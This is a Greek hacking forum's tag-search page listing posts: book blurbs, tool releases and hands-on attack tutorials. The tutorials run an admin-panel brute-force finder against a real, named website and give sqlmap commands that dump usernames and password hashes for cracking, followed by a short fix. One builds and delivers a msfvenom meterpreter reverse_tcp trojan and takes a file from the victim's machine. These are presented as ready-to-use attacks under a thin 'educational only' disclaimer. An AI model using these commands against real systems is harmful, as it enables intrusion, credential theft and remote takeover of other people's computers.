Μετάβαση στο περιεχόμενο

Αναζήτηση στην κοινότητα

Εμφάνιση αποτελεσμάτων για τις ετικέτες 'hacking'.

  • Αναζήτηση με βάση τις ετικέτες

    Πληκτρολογήστε τις ετικέτες και χωρίστε τες με κόμμα.
  • Αναζήτηση με βάση τον συγγραφέα

Τύπος περιεχομένου


Ενότητες

  • GreekHacking
    • Κανόνες & Ανακοινώσεις
    • Καλωσόρισμα νέων μελών
    • Προτάσεις / Βελτιώσεις
    • Νέα σχετικά με το Hacking/Security
    • Ασφάλεια & Προστασία Δεδομένων
    • Εκτός Θέματος
  • Leaks
    • Hacking Tutorials
    • Anonymity & Privacy / Ανωνυμία και Προστασία Προσωπικών Δεδομένων
    • Προγράμματα για Hacking / Hacking Programs
    • Cracking Οδηγοί & Πληροφορίες
    • Βιβλία σχετικά με το Hacking
    • Προγράμματα - High Quality downloads
    • E-Books
    • XXX Movies

Categories

  • Ορολογίες
  • Hacking για αρχάριους
  • Hacking για προχωρημένους
  • Mobile Hacking
  • Cracking Tutorials
  • Hacking Computers
  • Hacking Tutorials στα Αγγλικά
  • Tutorials for hacks
  • Διάφοροι Οδηγοί
    • Οδηγοί σχετικά με τα Linux
    • Οδηγοί για υπολογιστές
    • Οδηγοί σχετικά με τα Mac
    • Οδηγοί για κινητά
  • Hacking Tutorials στα Αγγλικά Copy

Categories

  • Hacking
  • Ιστοσελίδες/Server
  • Hardware
  • Windows

Βρείτε αποτελέσματα...

Βρείτε αποτελέσματα που...


Ημερομηνία δημιουργίας

  • Start

    End


Τελευταία ενημέρωση

  • Start

    End


Φιλτράρισμα με βάση τον αριθμό των...

  1. This book will show you how to use Python, create your own hacking tools, and make the most out of available resources that are made using this programming language. If you do not have experience in programming, don’t worry – this book will show guide you through understanding the basic concepts of programming and navigating Python codes. This book will also serve as your guide in understanding common hacking methodologies and in learning how different hackers use them for exploiting vulnerabilities or improving security. You will also be able to create your own hacking scripts using Python, use modules and libraries that are available from third-party sources, and learn how to tweak existing hacking scripts to address your own computing needs. Hacking with Python The Ultimate Beginners Guide - Steve Tale.pdf
  2. Harden the human firewall against the most current threats Social Engineering: The Science of Human Hacking reveals the craftier side of the hacker’s repertoire—why hack into something when you could just ask for access? Undetectable by firewalls and antivirus software, social engineering relies on human fault to gain access to sensitive spaces; in this book, renowned expert Christopher Hadnagy explains the most commonly-used techniques that fool even the most robust security personnel, and shows you how these techniques have been used in the past. The way that we make decisions as humans affects everything from our emotions to our security. Hackers, since the beginning of time, have figured out ways to exploit that decision making process and get you to take an action not in your best interest. This new Second Edition has been updated with the most current methods used by sharing stories, examples, and scientific study behind how those decisions are exploited. Networks and systems can be hacked, but they can also be protected; when the “system” in question is a human being, there is no software to fall back on, no hardware upgrade, no code that can lock information down indefinitely. Human nature and emotion is the secret weapon of the malicious social engineering, and this book shows you how to recognize, predict, and prevent this type of manipulation by taking you inside the social engineer’s bag of tricks. Examine the most common social engineering tricks used to gain access Discover which popular techniques generally don’t work in the real world Examine how our understanding of the science behind emotions and decisions can be used by social engineers Learn how social engineering factors into some of the biggest recent headlines Learn how to use these skills as a professional social engineer and secure your company Adopt effective counter-measures to keep hackers at bay By working from the social engineer’s playbook, you gain the advantage of foresight that can help you protect yourself and others from even their best efforts. Social Engineering gives you the inside information you need to mount an unshakeable defense. Social Engineering The Science of Human Hacking 2nd Edition by Christopher Hadnagy.pdf
  3. Implement reverse engineering techniques to analyze software, exploit software targets, and defend against security threats like malware and viruses. Key Features Analyze and improvise software and hardware with real-world examples Learn advanced debugging and patching techniques with tools such as IDA Pro, x86dbg, and Radare2. Explore modern security techniques to identify, exploit, and avoid cyber threats Book Description If you want to analyze software in order to exploit its weaknesses and strengthen its defenses, then you should explore reverse engineering. Reverse Engineering is a hackerfriendly tool used to expose security flaws and questionable privacy practices.In this book, you will learn how to analyse software even without having access to its source code or design documents. You will start off by learning the low-level language used to communicate with the computer and then move on to covering reverse engineering techniques. Next, you will explore analysis techniques using real-world tools such as IDA Pro and x86dbg. As you progress through the chapters, you will walk through use cases encountered in reverse engineering, such as encryption and compression, used to obfuscate code, and how to to identify and overcome anti-debugging and anti-analysis tricks. Lastly, you will learn how to analyse other types of files that contain code. By the end of this book, you will have the confidence to perform reverse engineering. What you will learn Learn core reverse engineering Identify and extract malware components Explore the tools used for reverse engineering Run programs under non-native operating systems Understand binary obfuscation techniques Identify and analyze anti-debugging and anti-analysis tricks Who this book is for If you are a security engineer or analyst or a system programmer and want to use reverse engineering to improve your software and hardware, this is the book for you. You will also find this book useful if you are a developer who wants to explore and learn reverse engineering. Having some programming/shell scripting knowledge is an added advantage. Table of Contents Preparing to Reverse Identification and extraction of hidden components The Low-Level Language Static and Dynamic Reversing Tools of the trade RE in Linux platforms RE in Windows platforms Sandboxing: Virtualization as a component for RE Binary Obfuscation Techniques Packing and Encryption Anti-analysis Tricks Practical Reverse Engineering of a Windows Executable Reversing various File-types Mastering Reverse Engineering Re-engineer your ethical hacking skills by Reginald Wong.pdf
  4. Σίγουρα όσοι έχουν βρει ένα τρωτό σημείο σε μία ιστοσελίδα και το έχουν εκμεταλλευτεί, θα απορούν και που βρίσκεται το Panel, δηλαδή η σελίδα «σύνδεσης» του Admin έτσι ώστε να βάλουν τα στοιχεία και να πάρουν πρόσβαση. Κάποιοι όπως και εγώ, κάνουμε δοκιμές στο url της ιστοσελίδας όπως « /admin, /admin/login.php, /wp-admin, /wp-login κ.τ.λ. » έλα όμως που κάποιες φορές αυτό δεν λειτουργεί και είμαστε σε σκέψεις τύπου... -Τι γίνεται ρε δεν έχει panel; -Το έχουν κρυμμένο; Η απάντηση είναι πως μπορεί όντως να μην το έχουν εμφανές αυτό το Panel λοιπόν και να βρίσκεται κάπου αλλού. Σε αυτήν την ανάρτηση όμως θα μάθουμε πως να το βρίσκουμε σε περίπτωση που το Website το έχει εμφανές το Panel του. Γι' αυτό θα σας «πλασάρω» ένα προγραμματάκι που λειτουργώ στο Linux μου και είναι κατεβασμένο από το Github (Κάποιοι από εσάς το γνωρίζετε). Πάμε να δούμε από που μπορούμε να το κατεβάσουμε λοιπόν. Το προγραμματάκι λέγεται Breacher. Αφού πάμε σε αυτό το Link: " https://github.com/s0md3v/Breacher " πατάμε εκεί που λέει Code πάνω δεξιά και αντιγράφουμε το Link που έχει μέσα. Θα σας το βάλω εδώ να μην το ψάχνετε: https://github.com/s0md3v/Breacher.git Αφού λοιπόν το κάνετε αντιγραφή, πάμε μετά στο terminal μας και γράφουμε τον εξής κώδικα Σε Root: git clone https://github.com/s0md3v/Breacher.git Σε απλό user: sudo git clone https://github.com/s0md3v/Breacher.git Όταν λοιπόν κατεβεί το προγραμματάκι μας το οποίο έχει φτιαχτεί με γλώσσα Python, θα πρέπει να το τρέξουμε. (ΠΡΟΣΟΧΗ! Πρέπει να χρησιμοποιείτε την Python 3 για να λειτουργίσει. Υπάρχουν αναλυτικά βιντεάκια στο YouTube για το πως να την κατεβάσετε). Μην βιάζεστε τόσο όμως. Για να τρέξουμε το προγραμματάκι πρέπει να μπούμε και στον φάκελο που βρίσκεται. Σωστά; Σωστά. Πάμε λοιπόν και γράφουμε τον παρακάτω κώδικα (Θα σας έχω και εικόνα γιατί το υποσχέθηκα στο προηγούμενό μου post) cd Breacher/ Μπήκαμε στον φάκελο που είναι το πρόγραμμα! Τώρα θα πρέπει να τρέξουμε το πρόγραμμα βάζοντας και την ιστοσελίδα που θέλουμε να μάθουμε το Panel. Εγώ θα χρησιμοποιήσω το eviakosmos. Δείτε παρακάτω πως python3 breacher.py -u http://www.eviakosmos.gr/ Με το " -u " του δίνουμε εντολή και του λέμε θέλω να ψάξεις γι αυτήν την ιστοσελίδα " -u = στόχος " Τώρα πατάμε Enter, και αρχίζει από κάτω και τρέχει ένα σωρό Links από μια wordlist. Δηλαδή; Όλα τα πιθανά. Όπως όταν θέλουμε να σπάσουμε hash από κωδικούς και τρέχουμε μία wordlist. Αυτή η μέθοδος ονομάζεται Brute Force. Αφού τρέχει, μπορεί κάποια στιγμή να βρεί αυτό που θέλουμε. Πως θα το καταλάβουμε; Αντί για " [ - ] " θα έχει " [ + ] " Δείτε τα αποτελέσματα στην παρακάτω εικόνα [+] Admin panel found: http://www.eviakosmos.gr/administrator Τέλεια! Βλέπουμε ότι βρήκε αυτό που θέλαμε. Πάμε να το τσεκάρουμε να δούμε αν λειτουργεί; Πάμε Κάνουμε copy το link, ανοίγουμε το Browser μας και το κάνουμε paste στο url. Δείτε την παρακάτω εικόνα Φανταστικά. Βρήκαμε το Admin Panel της ιστοσελίδας με μία απλή wordlist. Σας ευχαριστώ όλους που διαβάσατε αυτό το άρθρο, ό,τι απορίες έχετε γράψτε στα σχόλια και να είστε πάντα προσεκτικοί στο διαδίκτυο σε ό,τι και να κάνετε 🙂
  5. Επειδή ό,τι λέω το κάνω κάποια στιγμή, σας είχα πει όταν έκανα τον οδηγό για το POST METHOD ότι θα κάνω και οδηγό για το πως να προστατευτούμε από ένα SQL INJECTION attack σε GET METHOD. Τι εννοούμε GET? Εννοώ η πληροφορία που Παίρνω και όχι που δίνω στον Server όπως είναι το POST με login, register κ.τ.λ. Όπως έχουμε πει με τα google dorks inurl:.php?id=1 , που δίνουμε στην google να καταλάβει ότι θέλουμε να ψάξουμε στην αναζήτη ΜΟΝΟ ιστοσελίδες και σελίδες που έχουν ΜΟΝΟ παράμετρο ID στο URL τους... Ε αυτό θα κάνουμε σήμερα. Θα μάθουμε πως να μην τρώει MYSQL ERROR η σελίδα όταν βάζουμε το quote " ' " δίπλα από την παράμετρο. Π.Χ id=1' . Αφήνω λοιπόν την πολλή εξήγηση και πάμε να μπούμε στο ψητό. Εδώ του λέμε να πάρει το ID το οποίο το έχουμε ορίσει και user_id και μετά φτιάχνουμε ένα query με users όπου id=$user_id. Πρώτα απ' όλα βλέπουμε τον κώδικά μας. Έχουμε χτίσει ένα table γράφοντας κώδικα HTML ΜΕΣΑ ΣΤΗΝ PHP, και με τα $row που έχουμε ορίσει πιο πάνω από το foreach και $sql_run, του δείχνουμε να καταλάβει πως θέλουμε στα tables να εμφανίζετε ΚΑΘΕ χρήστης μέσα από την βάση. (θα δείτε παρακάτω σε screenshot). Ακριβώς από κάτω από αυτά τα $row, δίνουμε άλλο ένα row και το πιο σημαντικό γι αυτό το topic. Του λέμε όταν πατηθεί το «κουμπί» EDIT που θα υπάρχει στο table, να μας ανακατευθύνει ( href ) στην σελίδα edit.php (που έχουμε φτιάξει) αλλά όχι μόνο εκεί, αλλά και στην παράμετρο. Δηλαδή για παράδειγμα θέλουμε να κάνουμε edit τα στοιχεία του χρήστη MATA ο οποίος mata μέσα στην βάση σαν ID έχει τον αριθμό 64. Οπότε θα γράψεις στο url edit.php?id= (Και τον αριθμό του id του χρήστη μέσα στην βάση) $row['id']. Προφανώς το ID αν δεν ξέρετε πως το διαβάζει μέσα από την βάση, το διαβάζει διότι κάναμε πριν query "SELECT * FROM users". Δηλαδή; Επέλεξέ τα όλα (*) από το table users. Και αμέσως μετά τρέξαμε το $sql_run = mysqli_query($conn, $sql) (το sql ήταν το variable που είχαμε ορίσει για το query ( $sql = "SELECT * FROM users ). Εδώ έχουμε τα tables που είπα πρίν. Και με ID χρήστη τον αριθμό 64. (όσοι χρήστες υπάρχουν μέσα στην βάση τόσο θα αυξάνεται η λίστα). Πατάμε λοιπόν edit να δούμε τι γίνεται στο url. Όπως βλέπουμε, το URL δείχνει τον αριθμό 64 στην παράμετρο ID. Αυτό γίνεται επειδή πρίν στο href βάλαμε το $row['id'] όπως σας εξήγησα παραπάνω. Πάμε λοιπόν να βάλουμε ένα QUOTE στην παράμετρο να δούμε πως και ΓΙΑΤΙ αντιδράει η ιστοσελίδα με ERROR. Όσοι έχετε πάει να κάνετε SQL INJECTION επίθεση σίγουρα έχετε παρατηρίσει κάποιο τέτοιο error. To error αυτό ονομάζεται ERROR-BASED SQL INJECTION. Error based ονομάζεται όταν το quote (') «σπάει» το Syntax. Γι αυτό και γράφει "You have an error in your SQL Syntax". Πάμε να το εκμεταλλευτούμε αυτό; Θα είναι πανεύκολο γιατί ο απρόσεκτος Developer ξέχασε να βάλει τα φίλτρα στον κώδικά του οπότε εγώ σαν κακόβουλος θα μπορέσω να τον εκμεταλλευτώ... Πάμε και γράφουμε λοιπόν sqlmap -u "http://<target>.com/edit.php?id=1" --dbs Το --dbs είναι για να βρεί τις βάσεις δεδομένων. Μας πετάει cookies και πατάμε Y για να τα χρησιμοποιήσουμε. Πόσο ευχάριστο για εμάς ε; Εδώ μας λέει ΄΄οτι ΠΙΘΑΝΟΝ η παράμετρος ID να είναι ευπαθής και η ΠΙΘΑΝΗ Database είναι MySQL. Θέλουμε να κάνουμε skip τα άλλα payload tests για άλλες dbmses? Και πατάμε Yes. Διότι δεν χρειαζόμαστε κάτι άλλο. Τι είπαμε πριν; Error-based. Πάμε παρακάτω τα εξήγησα πρίν αυτά. Η παράμετρος ID είναι ευπαθής. Θές να τσεκάρεις κι άλλες παραμέτρους; (Δεν χρειάζεται οπότε NO) Τι κακό τον βρήκε....... Αν θυμάστε από τον προηγούμενο οδηγό η database λεγόταν ergasiasxol. Πάμε να μπούμε σε αυτήν γράφοντας sqlmap -u "http://<target>.com/edit.php?id=64" -D ergasiasxol --tables -D ergasiasxol για να μπούμε σε αυτήν την βάση, και το --tables για να μας εμφανίσει τα tables. Βλέπουμε πως υπάρχει το table users. Οπότε πάμε να μπούμε σε αυτό και να δούμε τα columns. sqlmap -u "http://<target>.com/edit.php?id=64" -D ergasiasxol -T users --columns Εδώ βλέπουμε τα columns. Εμείς χρειαζόμαστε μόνο το username και το password. Πάμε να τα κάνουμε DUMP για να τα δούμε. sqlmap -u "http://<target>.com/edit.php?id=64" -D ergasiasxol -T users -C username,password --dump Φτάσαμε στον στόχο μας. Βέβαια ο κωδικός είναι σε κρυπτογράφηση md5 έχω εξηγήσει εδώ πως το κάνουμε αυτό, οπότε απλά παίρνουμε το hash και το σπάμε (αν δεν υπάρχει σε online tool προτείνω crunch για να φτιάξετε λίστα). ############################################################ ΠΡΟΣΤΑΣΙΑ ########################################################### Πάμε λοιπόν τώρα να δούμε πως μπορούμε να προστατευτούμε από αυτήν την επίθεση. Πρέπει να πάμε ξανά στον κώδικά μας και να βρούμε που είναι το variable που έχουμε ορίσει για την $_GET['id']; . To user_id είναι το variable που έχουμε ορίσει για την GET. Το filtered_userid variable υπάρχει για να το προσθέσουμε μετά στο id=$filtered_userid στο query. Επίσης στο variable filtered_userid γράφουμε το εξής filter_var($user_id, FILTER_SANITIZE_NUMBER_INT); To filter_var είναι συνάρτηση της php η οποία χρησιμοποιείται για το φιλτράρισμα της μεταβλητής (variable). Στην περίπτωσή μας θέλουμε να φιλτράρουμε το variable $user_id που είναι της GET -> id=$row['id'] -> id=64 (στην προκειμένη περίπτωση). To FILTER_SANITIZE_NUMBER_INT αποτρέπει χαρακτήρες όπως το QUOTE. Πάμε λοιπόν τώρα να δούμε αν η σελίδα μας αντιδράει σε error. Απολύτως καμία αντίδραση. Πάμε να κάνουμε πάλι επίθεση λοιπόν CRITICAL. Δεν μας αφήνει να βρούμε βάση. Πάμε να δοκιμάσουμε και με risk και level και με v 6 Πάλι critical. Οπότε είμαστε καλυμμένοι. Θα βγάλω και οδηγό για το πως να προστατευτούμε από επίθεση XSS (CROSS SITE SCRIPTING) κάποια στιγμή. Be safe. 😀
  6. Ξάπλωσε στο κρεβάτι σου και άσε το script να σκανάρει. Αυτός και ο σκοπός μου στο συγκεκριμένο που έφτιαξα. Πάμε να δούμε πως λειτουργεί Του έχω ρίξει κάποιες αναβαθμίσεις και αυτός είναι ο λόγος που το βγάζω προς τα έξω. Βέβαια, πριν συνεχίσεις να διαβάζεις, θέλω να σου πω πως ακριβώς για τον λόγο που θα κάθεσαι στο κρεβάτι σου και αυτό θα τρέχει χάρη στον κόπο μου, θα χρεωθεί το script 10 ευρώ. Αν ενδιαφέρεσαι λοιπόν άκουσέ με. Το script αυτό έχει τα παρακάτω προς το παρόν CHECK HOST CMS SCAN DNS LOOKUP REVERSE IP UPLOAD DIR CHECK SUBDOMAIN SCANNER DIRECTORY SCANNING PORT SCANNING Δες και τα παρακάτω σκριν για το κάθε τι. Σου έχω βάλει αρκετές επιλογές νομίζω για να κάτσεις στο κρεβατάκι σου αραχτός. Βέβαια το πρόγραμμα ενημερώνεται όπως ενημερώθηκε και σήμερα (προστέθηκαν παραπάνω cms για το cms scanner). Σε μελλοντικές ενημερώσεις θα προστεθεί και sql injection scanner και xss scanner και ου το καθεξής απο vulns. Όσο για το screen επειδή κάτι δεν πρόσθεσα, μπορείς με εντολή -w να βάλεις δική σου wordlist, αλλιώς αν δεν βάλεις τρέχει μία default για τα dir scans. Επίσης θα προστεθεθεί και εντολή -o κάποια στιγμή για να αποθηκεύει output. Από την στιγμή που θα το αγοράσεις και θα το πάρεις στα χέρια σου, θα έχεις από εμένα υποστήριξη και για ότι πρόβλημα παρουσιαστεί ή απορία έχεις θα μπορείς να επικοινωνήσεις μαζί μου είτε σε μήνυμα εδώ στο φόρουμ είτε στο email μου billymaata@gmail.com. Το πρόγραμμα δείχνει σε τι cms τρέχει το target, dns, reverse ip, πιθανά upload dirs σε ένα site, ότι subdomain υπάρχει και δεν υπάρχει, dir scanning και port scanning. Όσο ανεβαίνει η αξία του script, τόσο θα αυξάνονται και τα χρήματα. Πιστεύω πως ήδη το πουλάω αρκετά φθηνά. Βέβαια αν ήδη θα το έχεις δεν θα χρειαστεί να ξαναπληρώσεις, ότι ενημέρωση και αν γίνεται. Πως γίνεται η πληρωμή: Στείλε μου μήνυμα μην μπερδευτούμε. Enjoy.
  7. This hands-on guide will teach you all you need to know to bring your electronic inventions to life! This fully updated guide shows, step-by-step, how to disassemble, tweak, and re-purpose everyday devices for use in your own electronics creations. Written in the clear, easy-to-follow style that Dr. Simon Monk is famous for, this expanded edition includes coverage of both Arduino AND Raspberry Pi. Hacking Electronics: Learning Electronics with Arduino and Raspberry Pi, Second Edition, demonstrates each technique through fun DIY projects. Packed with full-color illustrations, photos, and diagrams, the book gets you up and running on your own projects right away. You will discover how to hack sensors, accelerometers, remote controllers, ultrasonic rangefinders, motors, stereo equipment, FM transmitters, and more. • Contains start-to-finish hacks for both Arduino AND Raspberry Pi! • Features new coverage of ready-made modules available online • Offers tips on working with Simon’s hacking electronics kit Hacking Electronics Learning Electronics with Arduino and Raspberry Pi Second Edition 2nd Edition Kindle Edition by Simon Monk.pdf
  8. Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβαση msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe -p = payload -LHOST: localhost LPORT: local port -f: file Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό. Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole) Αφού ανοίξει πληκτρολογούμε use multi/handler Αμέσως μετά βάζουμε payload. set PAYLOAD windows/x64/meterpreter/reverse_tcp Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας. Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>". Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>". Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο. http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom) και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση (Συγγνώμη αν δεν πίασει το gif) Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε". Για να το κάνουμε αυτό πατάμε download greekhacking.txt Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο Ακριβώς το ίδιο! Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη --------------------------------------------------------------------------------------------------------------- Buy Me A Coffee: https://www.buymeacoffee.com/mataroot Συνδρομή: https://www.buymeacoffee.com/mataroot/membership Discord Server: https://discord.gg/aStuy26X
  9. Καλησπέρα. Σήμερα πήραμε την απόφαση να μοιραστούμε μαζί σας το Desktop App του Greek Hacking. Ο λόγος που δημιουργήθηκε το App είναι απλά ο λόγος όπως δημιουργήθηκε και το Discord app για παράδειγμα. Δηλαδή; Είναι ακριβώς ίδιο με το greekhacking.gr απλά κατά την γνώμη μας διευκολήνει τον χρήστη ενώ ανοίγει το pc του να το έχει σε τελείως διαφορετική καρτέλα το Greek Hacking και να είναι και στο Desktop του. Screenshot: 1.) Κατεβάζουμε το αρχείο rar από το mediafire 2.) Το κάνουμε Extract κάπου (επιλογή σας) 3.) Πηγαίνουμε στο .exe αρχείο και πατάμε δεξί κλικ, δημιουργία συντόμευσης (create shortcut) 4.) Παίρνουμε το SHORTCUT και το κάνουμε drag and drop στην επιφάνεια εργασίας μας. Προσοχή μην σβήσετε κάποιο .dll αρχείο μέσα από τον φάκελο. Βάλτε τον κάπου ασφαλής και κρατήστε το shortcut στο desktop σας χωρίς να το κάνετε κάποιο rename. Ευχαριστούμε. Download: MediaFire virustotal: https://www.virustotal.com/gui/file/401bf0b823f2fdb705fd6e094f0cc95c86245aacc4cd09b1d9e937e01c6b4bdc?nocache=1
  10. Κλασσικά άλλο ένα update για το greekhacking. v1.2.8 αν και πλέον βρίσκεται στο 1.2.9, απλά επειδή άλλαξα κάτι μόνο εσωτερικά και δεν έχει αλλαγές που φαίνονται, τράβηξα το βίντεο στο 1.2.8. Δείτε λοιπόν πως είναι πλέον το πρόγραμμα μετά τα updates git clone https://github.com/MataGreek/greekhacking.git
  11. Σήμερα πήρα την απόφαση να φτιάξω ένα πρόγραμμα το οποίο είναι αρκετά βοηθητικό για όλους όσους θέλουν να βρίσκουν subdomains σε websites, τα οποία είναι αρκετά σημαντικά για αρκετούς λόγους , είτε αυτοί είναι ηθικοί είτε κακοπροαίρετοι. Αν θυμάστε και πιο παλιά, είχα κάνει μια ανάρτηση ενός προγράμματος που επίσης ήταν subdomain finder. Αλλά εδώ αλλάζουν τα πράγματα αρκετά. Πάμε λοιπόν να πούμε και να δούμε τι ακριβώς φτιάξαμε. Το πρόγραμμα λέγεται ypodomainfind3r. Είπαμε παραπάνω σε τι μας βοηθάει. Πάμε λοιπόν να κάνουμε μία σύγκριση σε σχέση με το προηγούμενο πρόγραμμά μου. Το προηγούμενο λειτουργούσε με μία wordlist που έτρεχε και ελπίζαμε κάποια στιγμή να βρει subdomains τα οποία θα υπάρχουν στην λίστα. Κρίμα όμως για την υπομονή και την επιμονή αυτή. Σε αυτό που έφτιαξα τώρα, ψάχνει μέσα στο "διαδίκτυο" να σας το πω πιο απλά και βγάζει όλα τα αποτελέσματα subdomains της ιστοσελίδας που δώσατε. Επίσης να πω ότι η διάρκεια για να βρει όλα τα subdomains είναι περίπου 5 εως 10 δευτερόλεπτα. Οπότε καταλαβαίνουμε ότι δεν περνάει κανένα μισάωρο μέχρι να τελειώσει όπως πριν. Πάμε να δούμε την χρήση του τώρα Αφού το κάνουμε install git clone https://github.com/MataGreek/ypodomainfind3r.git cd ypodomainfind3r/ pip install -r requirements.txt Λοιπόν. Από δω και πέρα θέλω να σας εξηγήσω τι έχω κάνει. Για να ανοίξουμε και να λειτουργήσουμε το πρόγραμμα πρέπει να δώσουμε τις εξής εντολές "python3" "-u" "-o (optional)" Ας δώσουμε ένα παράδειγμα python3 ypodomainfind3r.py -u "target" Με αυτό το command, του λέμε σε ποιο url να ψάξει. Στην παρακάτω εικόνα έψαξε στο example.com Αυτό κάνει το command -u. Πάμε τώρα να δούμε τι κάνει το -o. python3 ypodomainfind3r.py -u example.com -o file.txt Βάζουμε λοιπόν -o (και το αρχείο που θέλουμε να δημιουργήσουμε). Αφού το κάνουμε αυτό και τελειώσει το scanning, αν πάμε μετά μέσα στον φάκελο output που έχει το πρόγραμμα "cd output/" θα δούμε πως υπάρχει ένα αρχείο το οποίο λέγεται file.txt ή όπως αλλιώς το έχετε ονομάσει. Αυτό λοιπόν μέσα έχει το output του scanning με όλα τα subdomains. Και επειδή πρέπει να σας πείσω ότι δεν έχω πρόθεση να "χακάρω" τον υπολογιστή ή το κινητό σας ας ανεβάσω και ένα virustotal. https://www.virustotal.com/gui/file/e8c71068fca9a1d51af9257cebeb95459e12ac494d0084b2369b260c251844b2?nocache=1 Μόνο για ηθικούς σκοπούς τσογλάνια. Enjoy
  12. Καλησπέρα φόρουμ. Σήμερα είμαι αρκετά χαρούμενος μπορώ να πω διότι έχουν γίνει αρκετε΄ς αναβαθμίσεις στο πρόγραμμα που έχω φτιάξει για το Greek Hacking. Έκανα αλλαγές αυτόν τον καιρό και σήμερα κατάφερα να διορθώσω αρκετά bugs που είχε. Όσοι λοιπόν έχετε το πρόγραμμα, θα σας ζητηθεί Update στο version 1.2.4, ενώ όσοι δεν το έχετε μπορείτε να το κατεβάσετε από το link που θα σας βάλω από κάτω. Παρακαλώ ΜΟΝΟ για καλούς σκοπούς να χρησιμοποιηθεί το πρόγραμμα και όχι για παράνομο σκοπό. Όσοι έχετε το πρόγραμμα, σε αυτήν την περίπτωση πληκτρολογούμε Y ή yes για να γίνει το update. Έπειτα πρέπει να ανοίξετε και πάλι το πρόγραμμα για να πραγματοποιηθούν οι αλλαγές. Όσοι δεν το έχετε, θα πρέπει να τρέξετε πρώτα το αρχείο setup.py έτσι ώστε να κατεβούν όλα τα Requirements. Επίσης όσοι δεν έχετε την "pip" μην αγχώνεστε, θα κατεβεί αν τρέξετε το setup. Όσοι θέλετε βέβαια και δεν εμπιστεύεστε το setup.py μπορείτε να τρέξετε και το pip install -r requirements.txt. Αφού λοιπόν ανοίξουμε και πάλι το πρόγραμμα, πρέπει να βεβαιωθούμε πως τα version είναι ακριβώς τα ίδια. Έπειτα μπορείτε να χρησιμοποιήσετε το πρόγραμμα κανονικότατα. Από κάτω σας βάζω και μία εικόνα του virustotal. Virus total Link: https://www.virustotal.com/gui/file/4aafe52c17c622d2c97c3bd1058e4b712f5577d8add2eb369b54e3007b2c4a9a?nocache=1 Download program: https://github.com/MataGreek/greekhacking Terminal: git clone https://github.com/MataGreek/greekhacking.git Commands to run before open the program: python3 setup.py or if you have pip installed, pip install -r requirements.txt python3 greekhacking.py
  13. Παίζοντας με μερικές απλές εντολές με την mysql βάση δεδομένων που βρίσκεται πάνω στον vulnerable metasploitable server μας. Τίποτα το προχωρημένο άλλα απλές και βασικές εντολές με διάφορες εναλλακτικές που κάποιος μπορεί να χρισιμοποιήσει. Channel Link: https://peertube.it/c/m3tahckr/videos Tuttorial Link: https://peertube.it/w/2qdbAKn3vFp6AbW1tU4YSd
  14. [Greekhacking program V1.1.8] ######################## Νέα ενημέρωση στο πρόγραμμά μου. Έκδοση 1.1.8. Δεν έχω κάνει τρελή αλλαγή απλά το βρήκα καλό να προσθέσω κάτι, συγκεκριμένα στο Password Generator. Όσοι έχετε το πρόγραμμά μου γνωρίζετε πως όταν ανοίγει σας ζητάει να επιλέξετε έναν αριθμό για να ανοίξετε το αντίστοιχο πρόγραμμα. Στο νούμερο 4 λοιπόν που βρίσκεται το Password Generator έγιναν αλλαγές. Τι άλλαξε; ######## Το Password Generator για όσους δεν ξέρετε σου κάνει generate έναν τυχαίο κωδικό με σύμβολα, κεφαλαίους, μικρούς χαρακτήρες και αριθμούς έτσι ώστε να είναι ασφαλής. Όμως επέλεξα να το κάνω ακόμα πιο ασφαλή. Έβαλα το πρόγραμμα να ρωτάει αν θέλετε να κρυπτογραφήσετε τον κωδικό που σας έκανε generate γρήγορα και απλά. Απλά απαντάτε ένα "Yes" και θα σας βγάλει τον κωδικό που σας δώθηκε κρυπτογραφημένο. Για περισσότερες πληροφορίες και εξήγηση στείλτε μήνυμα Πάρτε ένα παράδειγμα στην παρακάτω εικόνα. Κατεβάστε το πρόγραμμα εδώ: https://github.com/MataGreek/greekhacking VIRUS TOTAL ΕΧΩ ΒΑΛΕΙ ΣΤΗΝ ΠΡΩΤΗ ΜΟΥ ΑΝΑΡΤΗΣΗ ΟΤΑΝ ΠΑΡΟΥΣΙΑΣΑ ΤΟ ΠΡΟΓΡΑΜΜΑ. ΠΑΡΑΚΑΛΩ ΤΣΕΚΑΡΕΤΕ ΤΗΝ
